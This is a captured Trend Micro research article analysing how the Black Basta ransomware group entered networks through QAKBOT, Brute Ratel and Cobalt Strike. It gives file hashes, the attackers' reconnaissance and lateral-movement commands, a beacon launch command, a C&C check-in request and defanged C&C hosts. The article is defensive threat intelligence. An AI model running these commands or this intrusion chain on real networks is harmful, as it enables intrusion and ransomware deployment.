www.trendmicro.com
Open in
urlscan Pro
23.203.87.70
Public Scan
URL:
https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html
Submission Tags: falconsandbox
Submission: On November 10 via api from US — Scanned from DE
Submission Tags: falconsandbox
Submission: On November 10 via api from US — Scanned from DE
Form analysis 3 forms found in the DOM
<form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form">
<table cellspacing="0" cellpadding="0" class="gsc-search-box" style="width:100%">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" size="10" class="gsc-input" name="search" title="search" placeholder="Search Trend Micro" autocomplete="off">
</td>
</tr>
</tbody>
</table>
</div>
</form><form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form-mobile">
<table cellspacing="0" cellpadding="0" class="gsc-search-box" style="width:100%">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" size="10" class="gsc-input" name="search" title="search" placeholder="Search Trend Micro" autocomplete="off">
</td>
<td class="gsc-search-close collapsed" style="width:1%;" data-target="#search-mobile-wrapper" data-toggle="collapse">
<span class="icon-close"></span>
</td>
</tr>
</tbody>
</table>
</div>
</form>POST #
<form class="acsb-form" data-acsb-search="form" enctype="multipart/form-data" action="#" method="POST"> <input type="text" tabindex="0" name="acsb_search" autocomplete="off" placeholder="Unclear content? Search in dictionary..."
aria-label="Unclear content? Search in dictionary..."> <i class="acsbi-search"></i> <i class="acsbi-chevron_down"></i> </form>Text Content
Skip to Content
↵ENTER
Skip to Menu
↵ENTER
Skip to Footer
↵ENTER
Microsoft Exchange Server Security Alert: Attacks Employ Zero-Day
Vulnerabilities | How to stay protected >
dismiss
1 Alerts
* Microsoft Exchange Server Security Alert: Attacks Employ Zero-Day
Vulnerabilities
dismiss
How to stay protected
* No new notifications at this time.
Download
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
Buy
* Find a Partner
* Home Office Online Store
* Renew Online
* Free Tools
* Contact Sales
* Locations Worldwide
* 1-888-762-8736 (M-F 8am - 5pm CST)
* Small Business
* Buy Online
* Renew Online
Region
* The Americas
* United States
* Brasil
* Canada
* México
* Middle East & Africa
* South Africa
* Middle East and North Africa
* Europe
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
* Asia & Pacific
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
Log In
* My Support
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Premium Support
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Referral Affiliate
Free trials
* Cloud
* Detection and Response
* User Protection
Folio (0)
Contact Us
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
Business
For Home
Products Products
Trend Micro One - our unified cybersecurity platform >
Hybrid Cloud Security
Workload Security
Conformity
Container Security
File Storage Security
Application Security
Network Security
Open Source Security
Network Security
Intrusion Prevention
Advanced Threat Protection
Industrial Network Security
Mobile Network Security
Zero Trust Secure Access
User Protection
Endpoint Security
Email Security
Mobile Security
Web Security
Industrial Endpoint
Detection & Response
XDR
Attack Surface Risk Management
Powered by
AI/Machine Learning
Global Threat Intelligence
All Products & Trials
Our Unified Platform
Service Packages
Small & Midsize Business Security
Solutions Solutions
For Cloud
Cloud Migration
Cloud-Native App Development
Cloud Operational Excellence
Data Center Security
SaaS Applications
Internet of Things (IoT)
ICS / OT
Connected Car
5G Security for Enterprises
Risk Management
Ransomware
Cyber Insurance
End-of-Support Systems
Compliance
Detection and Response
Industries
Healthcare
Manufacturing
Oil & Gas
Electric Utility
Federal
Why Trend Micro Why Trend Micro
The Trend Micro Difference
Customer Successes
The Human Connection
Strategic Alliances
Industry Leadership
Research Research
Research
About Our Research
Research and Analysis
Research, News and Perspectives
Security Reports
Security News
Zero Day Initiative (ZDI)
Blog
Research by Topic
Vulnerabilities
Annual Predictions
The Deep Web
Internet of Things (IoT)
Resources
DevOps Resource Center
CISO Resource Center
What Is?
Threat Encyclopedia
Cloud Health Assessment
Cyber Risk Assessment
Enterprise Guides
Glossary of Terms
EXPLORE THE CYBER RISK INDEX (CRI)
Use the CRI to assess your organization’s preparedness against attacks, and get
a snapshot of cyber risk across organizations globally.
Calculate your risk
Services & Support Services & Support
Services
Service Packages
Managed XDR
Support Services
Business Support
Log In to Support
Technical Support
Virus & Threat Help
Renewals & Registration
Education & Certification
Contact Support
Downloads
Free Cleanup Tools
Find a Support Partner
For Popular Products
Deep Security
Apex One
Worry-Free
Worry-Free Renewals
Partners Partners
Channel Partners
Channel Partner Overview
Managed Service Provider
Cloud Service Provider
Professional Services
Resellers
Marketplace
System Integrators
Alliance Partners
Alliance Overview
Technology Alliance Partners
Our Alliance Partners
Tools and Resources
Find a Partner
Education and Certification
Partner Successes
Distributors
Partner Login
Company Company
Overview
Leadership
Customer Success Stories
Human Connections
Strategic Alliances
Industry Accolades
Newsroom
Webinars
Events
Security Experts
Careers
History
Corporate Social Responsibility
Diversity, Equity & Inclusion
Trust Center
Internet Safety and Cybersecurity Education
Investors
Legal
×
Folio (0)
1 Alerts
* Microsoft Exchange Server Security Alert: Attacks Employ Zero-Day
Vulnerabilities
dismiss
How to stay protected
* No new notifications at this time.
Download
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
Buy
* Find a Partner
* Home Office Online Store
* Renew Online
* Free Tools
* Contact Sales
* Locations Worldwide
* 1-888-762-8736 (M-F 8am - 5pm CST)
* Small Business
* Buy Online
* Renew Online
Region
* The Americas
* United States
* Brasil
* Canada
* México
* Middle East & Africa
* South Africa
* Middle East and North Africa
* Europe
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
* Asia & Pacific
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
Log In
* My Support
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Premium Support
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Referral Affiliate
Free trials
* Cloud
* Detection and Response
* User Protection
Folio (0)
Contact Us
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
* Microsoft Exchange Server Security Alert: Attacks Employ Zero-Day
Vulnerabilities
dismiss
How to stay protected
* No new notifications at this time.
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
* Find a Partner
* Home Office Online Store
* Renew Online
* Free Tools
* Contact Sales
* Locations Worldwide
* 1-888-762-8736 (M-F 8am - 5pm CST)
* Small Business
* Buy Online
* Renew Online
* The Americas
* United States
* Brasil
* Canada
* México
* Middle East & Africa
* South Africa
* Middle East and North Africa
* Europe
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
* Asia & Pacific
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
* My Support
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Premium Support
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Referral Affiliate
* Cloud
* Detection and Response
* User Protection
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
undefined
Network
Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and
Cobalt Strike
Subscribe
Content added to Folio
Folio (0) close
Network
BLACK BASTA RANSOMWARE GANG INFILTRATES NETWORKS VIA QAKBOT, BRUTE RATEL, AND
COBALT STRIKE
We analyzed a QAKBOT-related case leading to a Brute Ratel C4 and Cobalt Strike
payload that can be attributed to the threat actors behind the Black Basta
ransomware.
By: Ian Kenefick, Lucas Silva, Nicole Hernandez October 12, 2022 Read time: 10
min (2565 words)
Save to Folio
Subscribe
--------------------------------------------------------------------------------
SUMMARY
QAKBOT’s malware distribution resumed on September 8, 2022 following a brief
hiatus, when our researchers spotted several distribution mechanisms on this
date. The distribution methods observed included SmokeLoader (using the ‘snow0x’
distributor ID), Emotet (using the ‘azd‘ distributor id), and malicious spam
that used the ‘BB’ and ‘Obama20x’ IDs.
A recent case involving the QAKBOT ‘BB’ distributor led to the deployment of
Brute Ratel (detected by Trend Micro as Backdoor.Win64.BRUTEL) — a framework
similar to Cobalt Strike — as a second-stage payload. This is a noteworthy
development because it is the first time we have observed Brute Ratel as a
second-stage payload via a QAKBOT infection. The attack also involved the use of
Cobalt Strike itself for lateral movement. We attribute these activities to the
threat actors behind the Black Basta ransomware.
Intrusion timeline
Figure 1. The intrusion timeline for the attack
THE RISE OF BRUTE RATEL AND OTHER C&C FRAMEWORKS
Brute Ratel is a commercial (paid) Adversary Emulation framework and a relative
newcomer to the commercial C&C Framework space, where it competes with more
established players such as Cobalt Strike.
Adversary Emulation frameworks like Brute Ratel and Cobalt Strike are marketed
to penetration testing professionals (Red Teams) for use in legitimate
penetration testing activities in which organizations seek to improve their
ability to detect and respond to real cyberattacks. These frameworks are used to
provide hands-on keyboard access from remote locations to emulate the tactics,
techniques, and procedures (TTPs) used by attackers in network intrusions.
On top of Cobalt Strike’s legitimate use cases, it has gained notoriety for its
illicit usage and near omnipresence in high-profile, human-operated ransomware
attacks during the past few years. It serves as a common second-stage payload
from Botnets such as QAKBOT (TrojanSpy.Win64.QAKBOT), IcedID
(TrojanSpy.Win64.ICEDID), Emotet (TrojanSpy.Win64.EMOTET), and Bumblebee
(Trojan.Win64.BUMBLELOADER), among others. Unfortunately, several versions of
Cobalt Strike have been leaked over the past couple of years, accelerating its
malicious use by cybercriminals.
As a result of its popularity compared to Brute Ratel, its detection coverage is
greater than that of the latter. This makes Brute Ratel and other less
established C&C frameworks an increasingly more attractive option for malicious
actors, whose activities may remain undetected for a longer period.
Brute Ratel has recently attracted greater interest from threat actors in the
cybercriminal underground, where versions of the framework are actively traded
and cracked versions circulated. It is unknown how Brute Ratel was initially
leaked, but its developers have acknowledged the leak on Twitter.
QAKBOT ‘BB’ to Brute Ratel
Figure 2. A summary of the campaign’s procedure
The campaign commences via a SPAM email containing a malicious new URL being
sent to potential victims. The URL landing page presents the recipient with a
password for a ZIP file.
Figure 3. Notification that the ZIP file has been downloaded, along with the
password to the file
SANDBOX AND SECURITY SOLUTION EVASION
The use of password-protected ZIP files at this stage is likely an attempt to
evade analysis by security solutions.
MARK OF THE WEB EVASION
The ZIP file contains a single .ISO file. The use of an ISO file is an attempt
to defeat the “Mark of the Web (MOTW),” which tags files as being downloaded
from the internet. It subjects these files to additional security measures by
Windows and endpoint security solutions.
The ISO file contains a visible LNK file that uses the “Explorer” icon and two
hidden subdirectories, each containing various files and directories. By
default, on Windows operating systems, hidden files are not displayed to the
user. Figure 5 illustrates what the user sees when the “Show hidden files”
setting is enabled.
Figure 4. The addition hidden subdirectories that the user sees when the “Show
hidden files” setting is enabled
The directory structure is as follows:
Figure 5. Directory structure
File Name
Description
Detection Name
SHA-256
Accounting#7405.iso
Trojan.Win32.QAKBOT.YACIW
582a5e2b2652284ebb486bf6a367aaa6bb817c856f08ef54db64c6994c5b91bd
Contract.lnk
LNK File
Trojan.LNK.QAKBOT.YACIW
e9e214f7338c6baefd2a76ee66f5fadb0b504718ea3cebc65da7a43a5ff819a4
fodder.txt
Decoy text file
4dcf06a5afc699bbb73650cefe4ad86a1b686a257c607e0b96dda85d69544d8a
enunciatedNaught.cmd
Malicious CMD File
Trojan.BAT.QAKBOT.YACIW
d44b05b248f95986211ab3dc2765f1d76683594a174984c8b801bd7eade8aa47
eyelid.png
Decoy PNG file
dd755395b36acfceaa0d7e9c5479df4b1c919d57837fe43068980c5fa7dd6875
reflectiveness.db
QAKBOT DLL
Trojan.Win32.QAKBOT.YACIW
01fd6e0c8393a5f4112ea19a26bedffb31d6a01f4d3fe5721ca20f479766208f
sharpOutvotes.js
Malicious JS File
Trojan.JS.QAKBOT.YACIW
06c4c4d100e9a7c79e2ee8c4ffa1f7ad165a014f5f14f90ddfc730527c564e35
Table 1. The file names, detection names, and hashes for the indicators used in
the initial part of the infection routine
COMMAND-LINE INTERFACE - EXECUTION SEQUENCE
QAKBOT uses obfuscation across two script files, a JavaScript (.js) file and a
Batch Script (.cmd) file, likely in an effort to conceal suspicious-looking
command lines.
Figure 6. The execution sequence for the command line interface
INITIAL QAKBOT C&C SERVER COMMUNICATION
The C&C Infrastructure is geographically distributed across compromised hosts
residing in predominantly residential Internet Service Provider (ISP) broadband
networks.
The following countries are where the C&C servers reside:
* Afghanistan
* Algeria
* Argentina
* Austria
* Brazil
* Bulgaria
* Canada
* Chile
* Colombia
* Egypt
* India
* Indonesia
* Japan
* Mexico
* Mongolia
* Morocco
* Netherlands
* Qatar
* Russia
* South Africa
* Taiwan
* Thailand
* Turkey
* United Arab Emirates
* United Kingdom
* United States
* Vietnam
* Yemen
These ‘Tier 1’ C&C Servers are considered disposable by the QAKBOT operators and
are replaced frequently (nearly every time there is a new distribution of the
malware), though some persist across multiple QAKBOT malware configurations.
Automated reconnaissance commands
Just six minutes after the initial C&C communication, and with the QAKBOT
malware now running inside an injected process (wermgr.exe), automated
reconnaissance in the infected environment is performed via the execution of
multiple built-in command line tools. The execution of these command lines is in
the following order:
Order
Process
Command Line
1
C:\Windows\SysWOW64\net.exe
net view
2
C:\Windows\SysWOW64\ARP.EXE
arp -a
3
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
4
C:\Windows\SysWOW64\nslookup.exe
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.<domain_fqdn>
5
C:\Windows\SysWOW64\net.exe
net share
6
C:\Windows\SysWOW64\ROUTE.EXE
route print
7
C:\Windows\SysWOW64\NETSTAT.EXE
netstat -nao
8
C:\Windows\SysWOW64\net.exe
net localgroup
9
C:\Windows\SysWOW64\whoami.exe
whoami /all
Table 2. The order of execution for the built-in command lines
This activity is visible in Trend Micro Vision One™, which detects the
suspicious usage of these built-in Windows commands.
Figure 7. Trend Micro Vision One showing the activities associated with
wermgr.exe
QAKBOT DROPS BRUTE RATEL
Five minutes after the automated reconnaissance activities are completed, the
QAKBOT-injected wermgr.exe process drops the Brute Ratel DLL and invokes it via
a rundll32.exe child process with the “main” export function.
Figure 8. Trend Micro Vision One showing Brute Ratel being invoked by wermgr.exe
via the rundll32.exe process
The backdoor is a HTTPS , which performs a check-in with the Brute Ratel Server
at symantecuptimehost[.]com:
POST hxxps://symantecuptimehost[.]com:8080/admin.php?login= HTTP/1.1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: symantecuptimehost[.]com:8080
Content-Length: 122
Cache-Control: no-cache
Figure 9. The Brute Ratel check-in
Further reconnaissance is performed in the environment to identify privileged
users. First, the built-in net.exe and nltest.exe are used.
Order
Process
1
C:\Windows\SysWOW64\net.exe
net group "Domain Admins" /domain
2
C:\Windows\SysWOW64\net.exe
net group "Domain Controllers" /domain
3
C:\Windows\SysWOW64\nltest.exe
nltest /domain_trusts /all_trusts
4
C:\Windows\SysWOW64\net.exe
net user <redacted> /domain
Table 3. Reconnaissance processes to identify privileged users
Second, the SharpHound utility is run via Brute Ratel in an injected svchost.exe
process to output JSON files that are ingested into BloodHound (that describes
the Active Directory Organisational Units, Group Policies, Domains, User Groups,
Computers, and Users). The files are then packed into a ZIP file in preparation
for exfiltration. The entire process is scripted and takes less than two seconds
to complete.
Figure 10. Outputting JSON files via svchost.exe
BRUTE RATEL DROPS COBALT STRIKE
Interestingly, the actors chose to leverage Cobalt Strike for lateral movement.
The first of several beacon files are dropped onto the same infected endpoint
running Brute Ratel C4, with the first being:
* C:\Users\Public\Name-123456.xls
This beacon file is executed on the same host running the Brute Ratel C4 using
the following command:
* rundll32 C:\users\public\Name-123456.xls,DllRegisterServer
The actor drops the other beacon files and copies these to administrative shares
on other hosts on the network, again using filenames bearing XLS attachments.
* C:\Users\Public\abcabc.xls
* C:\Users\Public\abc-1234.xls
* C:\Users\Public\Orders_12_34_56.xls
* C:\Users\Public\MkDir.xls
The commands used to copy the files are as follows:
C:\WINDOWS\system32\cmd.exe /C copy C:\users\public\fksro.xls
\\<HOST>\C$\users\public\abcabc.xls
The following list is the beacon C&C Servers:
* hxxps://fewifasoc[.]com | 45.153.242[.]251
* hxxps://hadujaza[.]com | 45.153.241[.]88
* hxxps://himiketiv[.]com | 45.153.241[.]64
The threat actors were then evicted from the environment before any final
actions could be taken. We assess based on the level of access and discovery
activity that the likely final actions would have been a domain-wide ransom
deployment.
QAKBOT ‘Obama’ to Brute Ratel
In another, more recent, incident, Trend Micro Research spotted QAKBOT using the
“Obama” distributor ID prefix (i.e. “Obama208”) also dropping Brutel Ratel C4 as
a second-stage payload.
In this case, the malware arrives as a password-protected ZIP file delivered via
HTML smuggling, which allows the attacker to “smuggle” an encoded malicious
script into an HTML attachment or web page. Once the user opens the HTML page in
the browser, the script is decoded and the payload is assembled.
Figure 11. QAKBOT distributors use password protection to defeat network and
sandbox security scans
Once the ZIP file is decrypted using the password provided in the HTML
attachment, the user is presented with an ISO file. The malicious files are
contained in the ISO file, which is used as a Mark of the Web bypass. Inside, an
ISO file bears the following directory structure:
Figure 12. ISO file directory structure
Since QAKBOT’s return, we have observed multiple varieties in the execution
chain, from scripting languages to file extensions and the use of export
function names and ordinals. For this infection, the following variation was
used:
Figure 13. The variation used for the infection
The infection plays out with the same TTPs (Tactics, Techniques, and Procedures)
described in the first kill chain in this blog. However, one notable difference
was observed in the C&C configuration, which used DNS over HTTPS (DoH) vs a more
traditional HTTPS C&C Channel. The C&C servers observed used HTTPS with
Let’s-Encrypt.
By using DoH, attackers can hide DNS queries from C&C domains. If SSL/TLS
traffic is not being inspected using man-in-the-middle (MitM) techniques, DNS
queries to the C&C server will therefore go unnoticed.
Figure 14. Brute Ratel Process performing C&C Communication via DNS over HTTPS
(DoH). The threat was contained before any final actions could be taken.
LINKS TO THE BLACK BASTA RANSOMWARE
Figure 15. Brute Ratel and Cobalt Strike Infrastructure used in QakBot to Black
Basta Intrusions (click the image for a larger version of it)
Based on our investigations, we can confirm that the QAKBOT-to-Brute
Ratel-to-Cobalt Strike kill chain is associated with the group behind the Black
Basta Ransomware. This is based on overlapping TTPs and infrastructure observed
in Black Basta attacks. It is not the first time that we have observed
intrusions via QAKBOT leading to Black Basta.
CONCLUSION AND SECURITY RECOMMENDATIONS
* Users can thwart new QAKBOT variants and other threats that spread through
emails by following some of these best practices:
* Verify the email sender and content before downloading attachments or
selecting embedded links from emails.
* Hover the pointer above embedded links to show the link’s target.
* Check the sender’s identity. Unfamiliar email addresses, mismatched email and
sender names, and spoofed company emails are some of the signs that the
sender has malicious intent.
* If the email claims to come from a legitimate company, verify if they
actually sent it before taking any action.
Organizations should take note of the trending use of Cobalt Strike in attacks,
living-off-the-land binaries (LOLBins), and red team or penetration-testing
tools, i.e. Brutel Ratel C4, to blend in with the environment.
Users can also protect systems through managed detection and response (MDR),
which utilizes advanced artificial intelligence to correlate and prioritize
threats, determining if they are part of a larger attack. It can detect threats
before they are executed, thus preventing further compromise.
The constant resurgence of new, more sophisticated variants of known malware, as
well as the emergence of entirely unknown threats, demand solutions with
advanced detection and response capabilities such as Trend Micro Vision One, a
technology that can provide powerful XDR capabilities that collect and
automatically correlate data across multiple security layers — from email and
endpoints to servers, cloud workloads, and networks. Trend Micro Vision One can
prevent attacks via automated protection, while also ensuring that no
significant incidents go unnoticed.
TACTICS, TECHNIQUES, AND PROCEDURES (TTPS)
Tactic / Technique
Notes
TA0001 Initial Access
T1566.001 Phishing: Spear phishing Attachment
Victims receive spear phishing emails with attached malicious zip files -
typically password protected or HTML file. That file contains an ISO file.
T1566.001 Phishing: Spear phishing Link
QAKBOT has spread through emails with newly created malicious links.
TA0002 Execution
T1204.001 User Execution: Malicious Link
QAKBOT has gained execution through users accessing malicious link
T1204.002 User Execution: Malicious Link
QAKBOT has gained execution through users opening malicious attachments
T1569.002 System Services: Service Execution
Cobalt Strike can use PsExec to execute a payload on a remote host. It can also
use Service Control Manager to start new services
T1059.005 Command and Scripting Interpreter: Visual Basic Script
QAKBOT can use VBS to download and execute malicious files
T1059.007 Command and Scripting Interpreter: JavaScript
QAKBOT abuses Wscript to execute a Jscript file.
TA0003 Persistence
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
QAKBOT can maintain persistence by creating an auto-run Registry key
TA0004 Privilege Escalation
T1055 Process Injection
QAKBOT can inject itself into processes like wermgr.exe
TA0006 Defense Evasion
T1027.006 Obfuscated Files or Information: HTML Smuggling
Smuggles a file’s content by hiding malicious payloads inside of seemingly
benign HTML files.
T1218.010 System Binary Proxy Execution: Regsvr32
QAKBOT can use Regsvr32 to execute malicious DLLs
Cobalt Strike can use rundll32.exe to load DLL from the command line
T1140. Deobfuscate/Decode Files or Information
Initial QAKBOT .zip file bypasses some antivirus detections due to password
protections.
T1562.009. Impair Defenses: Safe Boot Mode
Black Basta uses bcdedit to boot the device in safe mode.
TA0007 Discovery
T1010 Application Window Discovery
QAKBOT can enumerate windows on a compromised host.
T1482 Domain Trust Discovery
QAKBOT can run nltest /domain_trusts /all_trusts for domain trust discovery.
T1135 Network Share Discovery
QAKBOT can use net share to identify network shares for use in lateral movement.
T1069.001 Permission Groups Discovery: Local Groups
QAKBOT can use net localgroup to enable the discovery of local groups
T1057 Process Discovery
QAKBOT has the ability to check running processes
T1018 Remote System Discovery
QAKBOT can identify remote systems through the net view command
T1082 System Information Discovery
QAKBOT can collect system information including the OS version and domain on a
compromised host
T1016 System Network Configuration Discovery
QAKBOT can use net config workstation, arp -a, and ipconfig /all to gather
network configuration information
T1049 System Network Connections Discovery
QAKBOT can use netstat to enumerate current network connections
T1033 System Owner/User Discovery
QAKBOT can identify the username on a compromised system
TA0008 Lateral Movement
T1021 Remote Services: SMB/Windows Admin Shares
Cobalt Strike can use Window admin shares (C$ and ADMIN$) for lateral movement
TA0011 Command and Control
T1071.001 Application Layer Protocol: Web Protocols
QAKBOT can use HTTP and HTTPS in communication with the C&C servers.
T1573. Encrypted Channel
Used by QAKBOT, BRUTEL and Cobalt Strike
TA0040 Impact
T1486. Data Encrypted for Impact
Black Basta uses the ChaCha20 algorithm to encrypt files. The ChaCha20
encryption key is then encrypted with a public RSA-4096 key that is included in
the executable.
T1489. Service Stop
Uses sc stop and taskkill to stop services.
T1490. Inhibit System Recovery
Black Basta deletes Volume Shadow Copies using vssadmin tool.
T1491 - Defacement
Replaces the desktop wallpaper to display the ransom note.
INDICATORS OF COMPROMISE
The indicators of compromise for this entry can be found here.
Tags
Malware | Research | Network | Articles, News, Reports | Cyber Threats
AUTHORS
* Ian Kenefick
Threats Analyst
* Lucas Silva
Incident Response Analyst
* Nicole Hernandez
Threats Analyst
Contact Us
Subscribe
RELATED ARTICLES
* Hack the Real Box: APT41’s New Subgroup Earth Longzhi
* From Bounty to Exploit: Observations About Cybercriminal Contests
* TeamTNT Returns — Or Does It?
See all articles
RECOMMENDED FOR YOU
cyber threats
DEIMOSC2: WHAT SOC ANALYSTS AND INCIDENT RESPONDERS NEED TO KNOW ABOUT THIS C&C
FRAMEWORK
LEARN MORE
* Contact Sales
* Locations
* Careers
* Newsroom
* Trust Center
* Privacy
* Accessibility
* Support
* Site map
* linkedin
* twitter
* facebook
* youtube
* instagram
* rss
Copyright © 2022 Trend Micro Incorporated. All rights reserved.
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
This website uses cookies for website functionality, traffic analytics,
personalization, social media functionality and advertising. Our Cookie Notice
provides more information and explains how to amend your cookie settings.Learn
more
Cookies Settings Accept
English
Accessibility Adjustments
Reset Settings Statement Hide Interface
Choose the right accessibility profile for you
OFF ON
Seizure Safe Profile Clear flashes & reduces color
This profile enables epileptic and seizure prone users to browse safely by
eliminating the risk of seizures that result from flashing or blinking
animations and risky color combinations.
OFF ON
Vision Impaired Profile Enhances website's visuals
This profile adjusts the website, so that it is accessible to the majority of
visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract,
Glaucoma, and others.
OFF ON
ADHD Friendly Profile More focus & fewer distractions
This profile significantly reduces distractions, to help people with ADHD and
Neurodevelopmental disorders browse, read, and focus on the essential elements
of the website more easily.
OFF ON
Cognitive Disability Profile Assists with reading & focusing
This profile provides various assistive features to help users with cognitive
disabilities such as Autism, Dyslexia, CVA, and others, to focus on the
essential elements of the website more easily.
OFF ON
Keyboard Navigation (Motor) Use website with the keyboard
This profile enables motor-impaired persons to operate the website using the
keyboard Tab, Shift+Tab, and the Enter keys. Users can also use shortcuts such
as “M” (menus), “H” (headings), “F” (forms), “B” (buttons), and “G” (graphics)
to jump to specific elements.
Note: This profile prompts automatically for keyboard users.
OFF ON
Blind Users (Screen Reader) Optimize website for screen-readers
This profile adjusts the website to be compatible with screen-readers such as
JAWS, NVDA, VoiceOver, and TalkBack. A screen-reader is software that is
installed on the blind user’s computer and smartphone, and websites should
ensure compatibility with it.
Note: This profile prompts automatically to screen-readers.
Content Adjustments
Content Scaling
Default
Readable Font
Highlight Titles
Highlight Links
Text Magnifier
Adjust Font Sizing
Default
Align Center
Adjust Line Height
Default
Align Left
Adjust Letter Spacing
Default
Align Right
Color Adjustments
Dark Contrast
Light Contrast
High Contrast
High Saturation
Adjust Text Colors
Cancel
Monochrome
Adjust Title Colors
Cancel
Low Saturation
Adjust Background Colors
Cancel
Orientation Adjustments
Mute Sounds
Hide Images
Read Mode
Reading Guide
Useful Links
Select an option Home Header Footer Main Content
Stop Animations
Reading Mask
Highlight Hover
Highlight Focus
Big Black Cursor
Big White Cursor
HIDDEN_ADJUSTMENTS
Keyboard Navigation
Accessible Mode
Screen Reader Adjustments
Read Mode
Web Accessibility By
Learn More
Choose the Interface Language
English
Español
Deutsch
Português
Français
Italiano
עברית
繁體中文
Pусский
عربى
عربى
Nederlands
繁體中文
日本語
Polski
Türk
Accessibility StatementCompliance status
We firmly believe that the internet should be available and accessible to anyone
and are committed to providing a website that is accessible to the broadest
possible audience, regardless of ability.
To fulfill this, we aim to adhere as strictly as possible to the World Wide Web
Consortium’s (W3C) Web Content Accessibility Guidelines 2.1 (WCAG 2.1) at the AA
level. These guidelines explain how to make web content accessible to people
with a wide array of disabilities. Complying with those guidelines helps us
ensure that the website is accessible to blind people, people with motor
impairments, visual impairment, cognitive disabilities, and more.
This website utilizes various technologies that are meant to make it as
accessible as possible at all times. We utilize an accessibility interface that
allows persons with specific disabilities to adjust the website’s UI (user
interface) and design it to their personal needs.
Additionally, the website utilizes an AI-based application that runs in the
background and optimizes its accessibility level constantly. This application
remediates the website’s HTML, adapts its functionality and behavior for
screen-readers used by blind users, and for keyboard functions used by
individuals with motor impairments.
If you wish to contact the website’s owner please use the website's form
Screen-reader and keyboard navigation
Our website implements the ARIA attributes (Accessible Rich Internet
Applications) technique, alongside various behavioral changes, to ensure blind
users visiting with screen-readers can read, comprehend, and enjoy the website’s
functions. As soon as a user with a screen-reader enters your site, they
immediately receive a prompt to enter the Screen-Reader Profile so they can
browse and operate your site effectively. Here’s how our website covers some of
the most important screen-reader requirements:
1. Screen-reader optimization: we run a process that learns the website’s
components from top to bottom, to ensure ongoing compliance even when
updating the website. In this process, we provide screen-readers with
meaningful data using the ARIA set of attributes. For example, we provide
accurate form labels; descriptions for actionable icons (social media icons,
search icons, cart icons, etc.); validation guidance for form inputs;
element roles such as buttons, menus, modal dialogues (popups), and others.
Additionally, the background process scans all of the website’s images. It
provides an accurate and meaningful image-object-recognition-based
description as an ALT (alternate text) tag for images that are not
described. It will also extract texts embedded within the image using an OCR
(optical character recognition) technology. To turn on screen-reader
adjustments at any time, users need only to press the Alt+1 keyboard
